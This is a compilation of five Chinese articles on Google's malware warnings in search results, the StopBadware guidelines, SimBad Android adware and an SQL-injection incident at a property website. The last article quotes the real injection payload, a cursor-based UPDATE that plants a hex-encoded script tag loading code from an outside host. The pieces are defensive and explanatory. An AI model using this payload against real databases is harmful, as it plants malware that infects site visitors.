“落单鸟”通过精心收集,向本站投稿了5篇恶意软件的噩梦―Google在搜索结果标示恶意网站,以下是小编为大家准备的恶意软件的噩梦―Google在搜索结果标示恶意网站,欢迎大家前来参阅。
- 目录
篇1:恶意软件的噩梦―Google在搜索结果标示恶意网站
在英文搜索中,Google早已经在搜索结果中标识恶意网站或可能有害的网站,前几天,这个功能被应用在Google中文搜索上,某些包含木马病毒的网站在Google搜索结果中会被提示“该网站可能会损害您的计算机。”
Google对这种提示信息的官方说明是:“该警告信息会显示在Google认为可能会包含恶意软件的搜索结果中。恶意软件通常是在用户访问这些站点时,在用户毫不知情或未经用户允许的情况下被安装的。恶意软件的例子包括在用户的计算机里删除数据;盗窃密码和信用卡号等一系列的个人信息;或者更换用户的搜索结果,
”
由于Google是世界上使用最多的搜索引擎之一,具有庞大的用户量,Google的做法使得“被标示的网站”处于一种极为窘迫的处境,显然,大多数用户不会冒险去点击这些Google认为不安全的网站,来自Google的访问量将大为减少,几乎等同于被Google删除,同时该网站的“声誉”也被用户所质疑。这种对于恶意网站的严厉打击旨在保护广大网民的上网安全。
目前被标识的中文网站还不多,通常情况下包含木马病毒的网站有可能会被标识,有一些网站被黑后被挂上木马病毒也会被标识,网站管理员可以通过“Google网站管理员工具”来检查自己网站是否被标识以及相关解决处理操作。(感谢zxmys的提示)
篇2:StopBadware.org恶意软件网站指南
译者按: StopBadware.org是一个面向消费者的致力于消除恶意软件(badware)的非盈利组织,根据StopBadware.org对恶意软件和恶意软件网站的定义,Google对索引中带有恶意软件的搜索结果会加上“This site may harm your computer” 或 “这个网站有可能会损害您的计算机”。然而,StopBadware.org是一个独立于Google的英文网站,很多中文网站管理员对它的英文恶意软件网站指南不是很了解,当Google给他们某个网站加上恶意软件标签时会不知所措。在此,我们首先翻译一下StopBadware.org的恶意软件网站指南。
StopBadware.org恶意软件网站指南
这一指南的宗旨是识别带有恶意软件问题的网站,无论问题的产生是有意而为的,还是通过不良的恶意软件寄存手法产生的。同时也让一些罗列第三方链接和程序的网站不被过分指责,因为一些不良链接或软件是从设计得相当好的网络里得到的,
1. 一般情况
一个网站是一个恶意软件的网站,如果它寄存或传播恶意软件并且不符合第二节所述的例外情况。这包括,但不仅限于,有以下任何一种行为的网站:在网站上直接寄存或传播恶意软件;
自动重定向到一个寄存或传播恶意软件的网站;
链接到恶意软件的可执行文件,无论是寄存在自己的网站或其他网站上;
链接到另一个企图自动安装恶意软件到用户电脑的网站;
使浏览器自动从另一个网站加载代码,然后企图在用户计算机上安装恶意软件;
大量链接(无论是性质上或数量上)到其他主要寄存或传播恶意软件的网站上。
2. 例外情况
上述网站指南的例外情况包括,但不仅限于:为探测和删除恶意软件而做出不懈努力的下载中心;
从事合法,非营利性恶意软件研究或教育的网站或网页;
自动、综合的索引网站。
9月22日 下午 07:10:00
译自:StopBadware.org Website Guidelines
来自:www.googlechinawebmaster.com/2007/09/stopbadwareorg.html
篇3:Google Play发现恶意软件究竟是什么情况?
发现该攻击行动的研究员称,这是一个名为“SimBad”的恶意软件所为,被其感染的应用程序全部都是模拟器游戏,并将自己伪装成广告来躲过怀疑。不仅如此,SimBad还能隐藏在用于推销和盈利目的的软件开发工具包(SDK)后面,令人更加难以察觉。
据了解,被SimBad感染后,除了显示恶意广告外,它还可以将受害者重定向到不安全网站,并从Play Store或远程服务器下载更多恶意程序实施钓鱼攻击。
研究员Elena Root和Andrey Polkovnichenko在已发表的博文中表示:这个恶意的SDK真的很容易骗过开发者,而后者甚至不知道是自己编写出的内容导致了此次攻击行动。因此,该次攻击并非针对特定的地区,而SimBad也并非出自一人之手。
简单来说,SimBad的攻击方式是在感染了目标设备后,恶意软件程序便会隐藏恶意程序的图标,当使用该设备时,它会在后台显示广告从而获得欺诈性收入,如此,SimBad自然不会引起注意甚至不会被怀疑。
这里,Check Point为我们整理出截至目前被SimBad感染且下载量最多的前十款应用程序,并称在所有被感染的应用程序中,大部分都是模拟器游戏,此外还有照片编辑器和壁纸应用程序,也可以点击查看全部名单
1、Snow Heavy Excavator Simulator (下载1000万次)
2、Hoverboard Racing (下载500万次)
3、Real Tractor Farming Simulator (下载500万次)
4、Ambulance Rescue Driving (下载500万次)
5、Heavy Mountain Bus Simulator 2018 (下载500万次)
6、Fire Truck Emergency Driver (下载500万次)
7、Farming Tractor Real Harvest Simulator (下载500万次)
8、Car Parking Challenge (下载500万次)
9、Speed Boat Jet Ski Racing (下载500万次)
10、Water Surfing Car Stunt (下载500万次)
好消息是,Check Point已与Google取得联系,并在发布本文时,将所有恶意应用程序从Google Play商店中删除。如果你已安装了其中一些应用程序,请立即将其删除并使用值得信赖的防病毒软件扫描自己的设备,进行杀毒。
令外,Check Point还建议用户不要从Play商店下载不必要的应用程序。当然,这不是第一次Android设备被感染如此大规模的广告软件事件。此前,Gooligan,CopyCat和LightsOut也进行过类似的攻击。这里,我们也希望所有安卓用户提高警惕,保持在线安全。
篇4:关于恶意软件警告:“该网站可能会损害您的计算机”
在现今资讯科技发达的时代,我们几乎做什么事都离不开网络了,网站的安全性显得日益重要,那些含有恶意软件的网站,常常导致用户的电脑发生问题、信用卡或是银行账户号码被泄漏、甚至身份被盗窃,造成无数的金钱损失。Google(谷歌)一直致力于保护用户不被连结至传播恶意软件的网站,希望将用户受到恶意软件危害的几率降至最低。因此,谷歌与 StopBadware.org 合作,于搜索结果中对那些在 StopBadware 公布的指南下被判定为发布恶意软件的网站标示警告:该网站可能会损害您的计算机。身为网站管理员,您可能很关切自己的网站被加注该警告的可能性;但我们要向您保证,我们很认真看待您的疑虑,并且非常小心以避免错误的标示。
其实,向用户提出警告只能解决部分的问题。我们更重要的目的是帮助网站管理员们保护自己的用户,与他们一起努力来消除威胁。多数被标示警告的网站,并非有意散布恶意软件,而是因为被 入侵了。我们发现,许多网站管理员不知道他们的网站遭到入侵;当他们看到自己努力耕耘的网站竟然在搜索结果中被标示了这个警告,都感到非常意外。在此,我们要推荐您使用谷歌网站管理员工具,以便您能及早发现您的网站被标示了警告。我们将恶意软件通知与网站管理员工具结合,并通过电子邮件发送给部分网站被标示警告的网站管理员,
如果您的网站被判定为散布恶意软件,您会在网站管理员工具的“诊断” 标签下看到相关的警告,以及找到帮助您纠正这个问题的信息。此外,该页也显示了您网站上被判定为危险网址的范例。当您因为找不到恶意软件的藏身之处而头疼的时候,这个提示便可助您一臂之力。例如,受到入侵网站的常见情形是 入一个像素的 iframe,而造成了自动从其他网站下载恶意软件。通过提供网址的示例,网站管理员可以进一步查找问题的来源,并作出修正来加强网站的安全。
如果您清除了您网站上所有的恶意软件,或是您认为您的网站被误判了,请访问stopbadware.org/home/review 要求复审。一旦复审成功,您的网站将不再被标示该警告,而您的用户也会因为您的努力而受到更多的保障。然而我们还是要提醒您,即使您的网站没有恶意软件的警告标示,并不代表您的网站一定是安全无虞的。您可以参考 StopBadware 所提供的一些小技巧来加强您网站的安全;持续不断的保护及监控您的网站才是避免恶意软件入侵的不二选择。
来自:googlechinablog.com/2007/06/blog-post_05.html
篇5:警惕恶意软件破坏 网站SQL注入防御实战WEB安全
SQL注入作为直接威胁web业务的最严重攻击行为,已经被大多数的网站管理员所了解,这种通过HTTP标准端口,利用网页编码不严谨,提交精心构造的代码实现对数据库非授权访问的攻击方法,已经被越来越多的scriptguy(脚本小子)成功掌握并广泛实践,没错,他们可能并不知道SQL注入的原理,不知道ASP,不知道PHP,但他们有工具,全自动的,完善的,高效率的工具,这些工具使得任何一个有简单网络知识的中学学生可以很容易的拿到某个 的最高管理员权限,而且做这些事情并不会比你在周六的中午下楼去买一听可乐要更困难。
而随着互联网黑色产业链的浮出水面,骇客们发现攻击网站不仅仅可以用作向朋友炫耀的资本,还可以作为购买游戏点卡或者是数码相机的资金来源:在被攻击的网站嵌入脚本木马,可以轻易盗窃那些访问了受攻击网站,但个人PC安全防护措施不全面用户的私密信息,比如游戏账号密码,或者是银行账号密码。
经常使用google的用户一定对这段话不陌生“该网站可能含有恶意软件,有可能会危害您的电脑”,这意味着这个网站也许已经遭遇挂马黑手,成为骇客们的众多取款点之一。本文就一例真实案例,来介绍一下网站的安全防护。
某市房地产网站的管理员小****上班就被叫到领导办公室去了,因为网站带上了google小尾巴:“该网站可能含有恶意软件,有可能会危害您的电脑”,购房者看到这一提示信息,纷纷给该市房产管理局打电话,于是就有了上面的一幕。回到座位上的小李一筹莫展:网站服务器已经全盘杀毒好几次了,没有发现病毒存在的痕迹,看来只能找专业安全厂商解决了。小李选择的是国内著名的一家网络安全公司,在向该安全公司提交web日志的第二天,小李就收到了回信,从日志的分析结果中,可以清楚的看到骇客的攻击走向:这是一次非常典型的SQL注入攻击,首先使用dEcLaRe建立游标,遍历数据库中所有允许写入字符串的相关字段,并通过执行exec操作,使用update语句替换了网站页面的正常文件,插入了如下一段十六进制字符:
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']
=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D68
7474703A2F2F732E736565392E75732F732E6A733E3C2F7363
726970743E3C212D2D%20aS%20vArChAr(67))')%20f
经过解密,可以得到如下字符串
\"][/title][script. src=s.see9.us/s.js][/script][!—
这里面的s.see9.us/s.js就是导致网站带有小尾巴的罪魁祸首,
经过一天的奋力工作,网页中所有的小尾巴都清理干净了,在安全工程师的建议下,小李还向StopBadware.org 申请了重新的索引,并向google提交了审核申请。做完了这些之后,小李又一次陷入了困扰:如何防范网站再次遭受SQL注入攻击呢?网络上提供了一些代码修改级的防御方法,可是需要对每一个页面都做仔细的检查,看着自己所负责网站的10000余个页面,小李只能是苦笑,联想起2007年夏天那次微软英国网站被SQL注入的案例,小李在内心否认了彻底检查一遍页面代码的做法。关键时刻,又是安全工程师提出了建议:部署天清入侵防御产品,利用天清IPS的基于注入攻击手法的检测原理,可以对各种SQL注入攻击的变种进行防御。和传统的SQL注入防御方法不一样的是,天清入侵防御产品可以独立部署,不需要对被保护的web系统做任何修改,而且和那些基于特征的检测方法不一样的是,天清IPS采用的VSID算法关注的是攻击手法而非攻击代码,其检测准确率有很大改善。
在部署了入侵防御产品的当天晚上,小李就在入侵防御产品的控制中心看到了发现了SQL注入攻击并被阻断的报警信息,而网站安然无恙。
友情提示:对于防御SQL注入攻击,检查网页代码是必要的,骇客获得网站权限,并不仅仅为了炫耀,可能还会有更肮脏的目的;其次,你需要做的事是挽回名誉损失,毕竟挂上google小尾巴不是件光荣的事;最后,你绝对不能忘记的事还有修补漏洞,在没有“打扫”干净你的系统前,骇客进出你的网络将会像喝下午茶一样简单,你可以选择修改源代码来过滤关键字(记住不要矫枉过正,笔者就见过不允许用户名叫select/and等SQL关键字的网站),或者是你也可以选择使用专业的IPS产品。
恶意软件的噩梦―Google在搜索结果标示恶意网站(整理5篇)
